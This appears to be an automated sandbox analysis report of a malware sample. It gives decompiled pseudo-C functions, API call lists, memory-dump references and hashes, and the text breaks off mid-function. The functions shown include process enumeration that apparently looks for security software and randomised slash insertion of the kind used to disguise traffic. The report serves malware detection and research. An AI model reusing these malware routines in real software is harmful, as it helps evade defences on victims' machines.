                                                                                                                                  			E031A2107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t29;
                                                                                                                                  				void* _t38;
                                                                                                                                  				signed int* _t39;
                                                                                                                                  				void* _t40;
                                                                                                                                  
                                                                                                                                  				_t36 = __ecx;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v12 = _a4;
                                                                                                                                  				_t38 = E031A3946(__ecx,  &_v32);
                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					_t39 = _a8;
                                                                                                                                  					L13:
                                                                                                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                  						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                  						_t23 = _t16;
                                                                                                                                  						if( *_t16 != 0) {
                                                                                                                                  							E031A65EA(_t23);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t38;
                                                                                                                                  				}
                                                                                                                                  				if(E031A37AC(0x40,  &_v16) != 0) {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t40 = CreateEventA(0x31ad2e4, 1, 0,  *0x31ad384);
                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                  					SetEvent(_t40);
                                                                                                                                  					Sleep(0xbb8);
                                                                                                                                  					CloseHandle(_t40);
                                                                                                                                  				}
                                                                                                                                  				_push( &_v32);
                                                                                                                                  				if(_a12 == 0) {
                                                                                                                                  					_t29 = E031A24BE(_t36);
                                                                                                                                  				} else {
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_t29 = E031A282B(_t36);
                                                                                                                                  				}
                                                                                                                                  				_t41 = _v16;
                                                                                                                                  				_t38 = _t29;
                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                  					E031A51BB(_t41);
                                                                                                                                  				}
                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                  					goto L12;
                                                                                                                                  				} else {
                                                                                                                                  					_t39 = _a8;
                                                                                                                                  					_t38 = E031A7CC7( &_v32, _t39);
                                                                                                                                  					goto L13;
                                                                                                                                  				}
                                                                                                                                  			}












                                                                                                                                  0x031a2184
                                                                                                                                  0x031a2192
                                                                                                                                  0x031a2186
                                                                                                                                  0x031a2186
                                                                                                                                  0x031a2187
                                                                                                                                  0x031a2188
                                                                                                                                  0x031a2189
                                                                                                                                  0x031a218a
                                                                                                                                  0x031a218b
                                                                                                                                  0x031a218b
                                                                                                                                  0x031a2197
                                                                                                                                  0x031a219a
                                                                                                                                  0x031a219e
                                                                                                                                  0x031a21a0
                                                                                                                                  0x031a21a0
                                                                                                                                  0x031a21a7
                                                                                                                                  0x00000000
                                                                                                                                  0x031a21a9
                                                                                                                                  0x031a21a9
                                                                                                                                  0x031a21b6
                                                                                                                                  0x00000000
                                                                                                                                  0x031a21b6

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(031AD2E4,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,031A555B,?,00000001,?), ref: 031A2158
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,?,?,031A555B,?,00000001,?,00000002,?,?,031A53C9,?), ref: 031A2165
                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,031A555B,?,00000001,?,00000002,?,?,031A53C9,?), ref: 031A2170
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,031A555B,?,00000001,?,00000002,?,?,031A53C9,?), ref: 031A2177
                                                                                                                                    • Part of subcall function 031A24BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,031A2197,?,031A2197,?,?,?,?,?,031A2197,?), ref: 031A2598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559942907-0
                                                                                                                                  • Opcode ID: eb137c6dc9a39ee144ebf9d6fe2c2b5a0c7a9299bb11fe495993142e39d4029b
                                                                                                                                  • Instruction ID: 873858587930dd1bdc1462aacb68a68a0416496e49ea538793c054a40649bb6e
                                                                                                                                  • Opcode Fuzzy Hash: eb137c6dc9a39ee144ebf9d6fe2c2b5a0c7a9299bb11fe495993142e39d4029b
                                                                                                                                  • Instruction Fuzzy Hash: 1921457E900A19ABCB14FFEC88849AEB7BDDF4C356B054825EB11E7104D734D9868BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction ID: e7c625cf5c8ee33ed51a7d1beea6d955a464cdec547837539f31e2f1f58af872
                                                                                                                                  • Opcode Fuzzy Hash: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction Fuzzy Hash: C221D872E05631EFEB115AE98C44B5A776D9F47BA0F310521E955AB384F630ED008DD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E031A22D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                  				intOrPtr _t31;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  				void* _t39;
                                                                                                                                  				int _t46;
                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                  				int _t48;
                                                                                                                                  
                                                                                                                                  				_t47 = __eax;
                                                                                                                                  				_push( &_v12);
                                                                                                                                  				_push(__eax);
                                                                                                                                  				_t39 = 0;
                                                                                                                                  				_t46 = 0;
                                                                                                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                  				_v8 = _t26;
                                                                                                                                  				if(_t26 < 0) {
                                                                                                                                  					L13:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				if(_v12 == 0) {
                                                                                                                                  					Sleep(0xc8);
                                                                                                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                  				}
                                                                                                                                  				if(_v8 >= _t39) {
                                                                                                                                  					_t28 = _v12;
                                                                                                                                  					if(_t28 != 0) {
                                                                                                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                  						_v8 = _t31;
                                                                                                                                  						if(_t31 >= 0) {
                                                                                                                                  							_t46 = lstrlenW(_v16);
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_t46 = _t46 + 1;
                                                                                                                                  								_t48 = _t46 + _t46;
                                                                                                                                  								_t39 = E031A75F6(_t48);
                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                  									_v8 = 0x8007000e;
                                                                                                                                  								} else {
                                                                                                                                  									memcpy(_t39, _v16, _t48);
                                                                                                                                  								}
                                                                                                                                  								__imp__#6(_v16);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t32 = _v12;
                                                                                                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                  					}
                                                                                                                                  					 *_a4 = _t39;
                                                                                                                                  					 *_a8 = _t46 + _t46;
                                                                                                                                  				}
                                                                                                                                  				goto L13;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1198164300-0
                                                                                                                                  • Opcode ID: ba11f93be651fa30c13de28ff5e8f55d830dc4d6cada5e50a5516c80ba0d45af
                                                                                                                                  • Instruction ID: d2c1dc9343a996f3bc44820e896162b88e26b1e0f2cf89a7febefe33e13a5591
                                                                                                                                  • Opcode Fuzzy Hash: ba11f93be651fa30c13de28ff5e8f55d830dc4d6cada5e50a5516c80ba0d45af
                                                                                                                                  • Instruction Fuzzy Hash: 2D21417D900609FFCB11DFA8C98499EBBB9FF4D302B1445A9E941E7210EB70DA41CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                  • _free.LIBCMT ref: 6E92F2FB
                                                                                                                                  • _free.LIBCMT ref: 6E92F331
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 23ed0a1c342dbd2ce7f7524b36b7aafebd5da9a912bdbe91f9a1c7b4e7a75932
                                                                                                                                  • Instruction ID: 0968982f0bf7dd37af59804bce30cbcf7c72255aa00c76726e50d22b7ea15124
                                                                                                                                  • Opcode Fuzzy Hash: 23ed0a1c342dbd2ce7f7524b36b7aafebd5da9a912bdbe91f9a1c7b4e7a75932
                                                                                                                                  • Instruction Fuzzy Hash: 44110A32229A226EEF411AF59C84D9F329D9FD36BDB350D34F534A61D8EF60C8098D50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F3F5
                                                                                                                                  • _free.LIBCMT ref: 6E92F452
                                                                                                                                  • _free.LIBCMT ref: 6E92F488
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F493
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: ae6c094546197cf17c398df98f9100d8ac1757b2f71d64555e1dc85395fbc064
                                                                                                                                  • Instruction ID: e73197dc68c5435c7b8b7e2190227aaa0a0fd879a24129ba6b53b217c5048673
                                                                                                                                  • Opcode Fuzzy Hash: ae6c094546197cf17c398df98f9100d8ac1757b2f71d64555e1dc85395fbc064
                                                                                                                                  • Instruction Fuzzy Hash: B411EC31628B116EEF611AF95C89D9B335DAFD267D7340934F534A63D8EFA0C8088920
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF95F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF96B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF980
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF998
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction ID: bd4805fce96bbe2cfd29895ea3203faea78ddc504dfd8c8a12b470b951a0bd0d
                                                                                                                                  • Opcode Fuzzy Hash: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction Fuzzy Hash: 48212AB1D0024CEFCB05CFD8C950BDDBBB9BF49318F108969E819AB694DB346A05CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF87F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF88B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF8A0
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF8B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction ID: db557a30f8cc965092d4e6c18c08b6e3dd7fccf8fc736e3744d96081085fa78a
                                                                                                                                  • Opcode Fuzzy Hash: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction Fuzzy Hash: AA214AB1D0024CEFCB05CFD8C840BDEBBB9BF49318F008969E819AB694DB306A05CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E031A26DD(unsigned int __eax, void* __ecx) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				signed int _t21;
                                                                                                                                  				signed short _t23;
                                                                                                                                  				char* _t27;
                                                                                                                                  				void* _t29;
                                                                                                                                  				void* _t30;
                                                                                                                                  				unsigned int _t33;
                                                                                                                                  				void* _t37;
                                                                                                                                  				unsigned int _t38;
                                                                                                                                  				void* _t41;
                                                                                                                                  				void* _t42;
                                                                                                                                  				int _t45;
                                                                                                                                  				void* _t46;
                                                                                                                                  
                                                                                                                                  				_t42 = __eax;
                                                                                                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                  				_t38 = __eax;
                                                                                                                                  				_t30 = RtlAllocateHeap( *0x31ad270, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                  				_v12 = _t30;
                                                                                                                                  				if(_t30 != 0) {
                                                                                                                                  					_v8 = _t42;
                                                                                                                                  					do {
                                                                                                                                  						_t33 = 0x18;
                                                                                                                                  						if(_t38 <= _t33) {
                                                                                                                                  							_t33 = _t38;
                                                                                                                                  						}
                                                                                                                                  						_t21 =  *0x31ad288; // 0xcbbea30d
                                                                                                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                  						 *0x31ad288 = _t23;
                                                                                                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                  						memcpy(_t30, _v8, _t45);
                                                                                                                                  						_v8 = _v8 + _t45;
                                                                                                                                  						_t27 = _t30 + _t45;
                                                                                                                                  						_t38 = _t38 - _t45;
                                                                                                                                  						_t46 = _t46 + 0xc;
                                                                                                                                  						 *_t27 = 0x2f;
                                                                                                                                  						_t13 = _t27 + 1; // 0x1
                                                                                                                                  						_t30 = _t13;
                                                                                                                                  					} while (_t38 > 8);
                                                                                                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                  				}
                                                                                                                                  				return _v12;
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,031A1A07,00000000,?,?,031A4653,?,05BD95B0), ref: 031A26E8
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 031A2700
                                                                                                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,031A1A07,00000000,?,?,031A4653,?,05BD95B0), ref: 031A2744
                                                                                                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 031A2765
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1819133394-0
                                                                                                                                  • Opcode ID: 5848b8acba8824de19c1af21e4caee48a73bf708eae637a4a1de2bcf97d19f27
                                                                                                                                  • Instruction ID: ed463c5e9ea7babe1abbeff02a52b8c94b4ed8677d79c3fcc4db69a9ddd22306
                                                                                                                                  • Opcode Fuzzy Hash: 5848b8acba8824de19c1af21e4caee48a73bf708eae637a4a1de2bcf97d19f27
                                                                                                                                  • Instruction Fuzzy Hash: 36115C76A00A14BFC314CAA9DC84D9EBBFEDBD8362B190276F404C7150E7708E40D7A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E031A5AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				void _v60;
                                                                                                                                  				char _v64;
                                                                                                                                  				intOrPtr _t18;
                                                                                                                                  				intOrPtr _t19;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				long _t28;
                                                                                                                                  
                                                                                                                                  				_t27 = __edi;
                                                                                                                                  				_t26 = _a8;
                                                                                                                                  				_t28 = E031A1A9C(_a4, _t26, __edi);
                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                  					memset( &_v60, 0, 0x38);
                                                                                                                                  					_t18 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t28 = 0;
                                                                                                                                  					_v64 = 0x3c;
                                                                                                                                  					if(_a12 == 0) {
                                                                                                                                  						_t7 = _t18 + 0x31ae4e8; // 0x70006f
                                                                                                                                  						_t19 = _t7;
                                                                                                                                  					} else {
                                                                                                                                  						_t6 = _t18 + 0x31ae8f0; // 0x750072
                                                                                                                                  						_t19 = _t6;
                                                                                                                                  					}
                                                                                                                                  					_v52 = _t19;
                                                                                                                                  					_push(_t28);
                                                                                                                                  					_v48 = _a4;
                                                                                                                                  					_v44 = _t26;
                                                                                                                                  					_v36 = _t27;
                                                                                                                                  					E031A34C7();
                                                                                                                                  					_push( &_v64);
                                                                                                                                  					if( *0x31ad0e4() == 0) {
                                                                                                                                  						_t28 = GetLastError();
                                                                                                                                  					}
                                                                                                                                  					_push(1);
                                                                                                                                  					E031A34C7();
                                                                                                                                  				}
                                                                                                                                  				return _t28;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1A9C: SysAllocString.OLEAUT32(00000000), ref: 031A1AF6
                                                                                                                                    • Part of subcall function 031A1A9C: SysAllocString.OLEAUT32(0070006F), ref: 031A1B0A
                                                                                                                                    • Part of subcall function 031A1A9C: SysAllocString.OLEAUT32(00000000), ref: 031A1B1C
                                                                                                                                  • memset.NTDLL ref: 031A5AD5
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A5B21
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$ErrorLastmemset
                                                                                                                                  • String ID: <$@MtNt
                                                                                                                                  • API String ID: 3736384471-2823972799
                                                                                                                                  • Opcode ID: a72a1ae63e88f0fb66d393c62fa0fba442fcb6b4e8c429bf1500a506a422cb87
                                                                                                                                  • Instruction ID: 093ad6e89415f54503688535b2e4b2924963560e7b5ade67aa4e29ec71112a73
                                                                                                                                  • Opcode Fuzzy Hash: a72a1ae63e88f0fb66d393c62fa0fba442fcb6b4e8c429bf1500a506a422cb87
                                                                                                                                  • Instruction Fuzzy Hash: E8012D79A00A18AFCB11EFA8D884EDEBBF9AF0C742F044526F904EB140D770D9458BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1E36
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1E43
                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E8F1E80
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FCD
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FF1
                                                                                                                                  • std::exception::exception.LIBCMTD ref: 6E8F1EA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2425033533-0
                                                                                                                                  • Opcode ID: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction ID: 84bc7622b8dd86b95011762930e5fef9f71cad178bb29a326bb75f629c6d9a3e
                                                                                                                                  • Opcode Fuzzy Hash: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction Fuzzy Hash: BD015BB1405B44DFC7208FAA848058AFAE4BF29254B908D6FE58987A01D730D545CB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E031A4A03() {
                                                                                                                                  				char _v264;
                                                                                                                                  				void* _v300;
                                                                                                                                  				int _t8;
                                                                                                                                  				intOrPtr _t9;
                                                                                                                                  				int _t15;
                                                                                                                                  				void* _t17;
                                                                                                                                  
                                                                                                                                  				_t15 = 0;
                                                                                                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                  				if(_t17 != 0) {
                                                                                                                                  					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                  					while(_t8 != 0) {
                                                                                                                                  						_t9 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  						_t2 = _t9 + 0x31aee3c; // 0x73617661
                                                                                                                                  						_push( &_v264);
                                                                                                                                  						if( *0x31ad110() != 0) {
                                                                                                                                  							_t15 = 1;
                                                                                                                                  						} else {
                                                                                                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						L7:
                                                                                                                                  						CloseHandle(_t17);
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  				L8:
                                                                                                                                  				return _t15;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 031A4A13
                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 031A4A26
                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 031A4A52
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 031A4A61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                  • Opcode ID: 3bd905367c2abe01430746636ee7cb14f2254d0d71717e304e68351387273c62
                                                                                                                                  • Instruction ID: cfa1692ae8931e696adca45d837bea81587b0d52d1a7585e73b75161d569a710
                                                                                                                                  • Opcode Fuzzy Hash: 3bd905367c2abe01430746636ee7cb14f2254d0d71717e304e68351387273c62
                                                                                                                                  • Instruction Fuzzy Hash: F7F0F63D100E246BC720F63B9D0ADDB76ACEBCD313F041062E516C3100EF60CA8686B5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4450() {
                                                                                                                                  				void* _t1;
                                                                                                                                  				intOrPtr _t5;
                                                                                                                                  				void* _t6;
                                                                                                                                  				void* _t7;
                                                                                                                                  				void* _t11;
                                                                                                                                  
                                                                                                                                  				_t1 =  *0x31ad2a4; // 0x2e0
                                                                                                                                  				if(_t1 == 0) {
                                                                                                                                  					L8:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				SetEvent(_t1);
                                                                                                                                  				_t11 = 0x7fffffff;
                                                                                                                                  				while(1) {
                                                                                                                                  					SleepEx(0x64, 1);
                                                                                                                                  					_t5 =  *0x31ad2f4; // 0x0
                                                                                                                                  					if(_t5 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t11 = _t11 - 0x64;
                                                                                                                                  					if(_t11 > 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				_t6 =  *0x31ad2a4; // 0x2e0
                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                  					CloseHandle(_t6);
                                                                                                                                  				}
                                                                                                                                  				_t7 =  *0x31ad270; // 0x57e0000
                                                                                                                                  				if(_t7 != 0) {
